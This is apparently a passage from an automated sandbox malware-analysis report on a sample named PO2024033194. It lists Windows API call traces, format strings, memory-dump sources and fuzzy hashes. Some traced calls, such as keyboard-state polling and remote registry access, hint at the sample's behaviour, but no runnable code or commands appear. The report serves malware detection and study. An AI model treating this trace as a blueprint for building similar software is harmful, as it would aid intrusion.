                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                  • __swprintf.LIBCMT ref: 0045E7F7
                                                                  • _wprintf.LIBCMT ref: 0045E8B3
                                                                  • _wprintf.LIBCMT ref: 0045E8D7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2295938435-2354261254
                                                                  • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                  • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                  • String ID: %.15g$0x%p$False$True
                                                                  • API String ID: 3038501623-2263619337
                                                                  • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                  • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                  • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                  • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                  APIs
                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                  • __swprintf.LIBCMT ref: 0045E5F6
                                                                  • _wprintf.LIBCMT ref: 0045E6A3
                                                                  • _wprintf.LIBCMT ref: 0045E6C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2295938435-8599901
                                                                  • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                  • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                  • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                  • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 00443B67
                                                                    • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                  • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                  • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                  • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                  • IsWindow.USER32(?), ref: 00443C3A
                                                                  • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                  • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                  • String ID: BUTTON
                                                                  • API String ID: 1834419854-3405671355
                                                                  • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                  • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                  • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                  • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                  • LoadStringW.USER32(00000000), ref: 00454040
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • _wprintf.LIBCMT ref: 00454074
                                                                  • __swprintf.LIBCMT ref: 004540A3
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                  • API String ID: 455036304-4153970271
                                                                  • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                  • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                  • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                  • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                  APIs
                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                  • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                  • _memmove.LIBCMT ref: 00467EB8
                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                  • _memmove.LIBCMT ref: 00467F6C
                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                  • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                  • String ID:
                                                                  • API String ID: 2170234536-0
                                                                  • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                  • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                  • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                  • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                  • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                  • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                  • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                  • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                  • GetKeyState.USER32(00000012), ref: 00453E26
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                  • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                  • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                  • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                  • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                  • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                  • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                  • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                  • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                  • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                  • String ID:
                                                                  • API String ID: 3096461208-0
                                                                  • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                  • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                  • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                  • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                  • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                  • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                  • DeleteObject.GDI32(?), ref: 0047151E
                                                                  • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                  • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                  • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                  • DeleteObject.GDI32(?), ref: 004715EA
                                                                  • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                  • String ID:
                                                                  • API String ID: 3218148540-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                  • String ID:
                                                                  • API String ID: 136442275-0
                                                                  APIs
                                                                  • _wcsncpy.LIBCMT ref: 00467490
                                                                  • _wcsncpy.LIBCMT ref: 004674BC
                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                  • _wcstok.LIBCMT ref: 004674FF
                                                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                  • _wcstok.LIBCMT ref: 004675B2
                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                  • _wcslen.LIBCMT ref: 00467793
                                                                  • _wcscpy.LIBCMT ref: 00467641
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • _wcslen.LIBCMT ref: 004677BD
                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                  • String ID: X
                                                                  • API String ID: 3104067586-3081909835
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                  • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                  • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                  • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                  • _wcslen.LIBCMT ref: 0046CDB0
                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                  • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                  • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                    • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                    • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                    • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                  Strings
                                                                  • NULL Pointer assignment, xrefs: 0046CEA6
                                                                  Similarity
                                                                  • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                  • String ID: NULL Pointer assignment
                                                                  • API String ID: 440038798-2785691316
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                  • _wcslen.LIBCMT ref: 004610A3
                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                  • GetWindowRect.USER32(?,?), ref: 00461248
                                                                    • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                  • String ID: ThumbnailClass
                                                                  • API String ID: 4136854206-1241985126
                                                                  APIs
                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                  • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                  • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                  • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                  • String ID: 2
                                                                  • API String ID: 1331449709-450215437
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                  • __swprintf.LIBCMT ref: 00460915
                                                                  • __swprintf.LIBCMT ref: 0046092D
                                                                  • _wprintf.LIBCMT ref: 004609E1
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                  • API String ID: 3054410614-2561132961
                                                                  APIs
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                  • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                  • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                  • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                  • API String ID: 600699880-22481851
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: DestroyWindow
                                                                  • String ID: static
                                                                  • API String ID: 3375834691-2160076837
                                                                  • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                  • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                  • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                  • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                  • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
